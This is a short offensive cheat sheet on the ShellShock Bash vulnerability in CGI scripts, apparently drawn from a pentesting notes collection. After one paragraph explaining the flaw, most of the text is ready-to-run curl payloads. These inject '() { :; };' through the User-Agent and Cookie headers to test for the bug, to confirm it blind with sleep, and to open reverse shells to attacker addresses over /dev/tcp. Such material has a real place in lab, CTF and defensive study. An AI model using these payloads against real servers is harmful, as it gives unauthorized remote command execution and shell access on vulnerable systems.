CGI
ShellShock
Bash can also be used to run commands passed to it by applications and it is this feature that the vulnerability affects. One type of command that can be sent to Bash allows environment variables to be set. Environment variables are dynamic, named values that affect the way processes are run on a computer. The vulnerability lies in the fact that an attacker can tack-on malicious code to the environment variable, which will run once the variable is received. Exploiting this vulnerability the page could throw an error. You could find this vulnerability noticing that it is using an old Apache version and cgi_mod (with cgi folder) or using nikto.
Reflected
curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'
Blind with sleep
(you could also make a ping or web request to yourself and monitor that oth tcpdump)
curl -k -H 'User-Agent: () { :; }; sleep 5' https://10.129.1.226:10000/left.cgi
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi
Out-Of-Band Use
Cookie as alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh
Reverse shell
curl -k -H 'User-Agent: () { :; }; /bin/bash -c "exec bash -i &>/dev/tcp/10.10.16.2/4444 <&1"' https://10.129.1.226:10000/left.cgi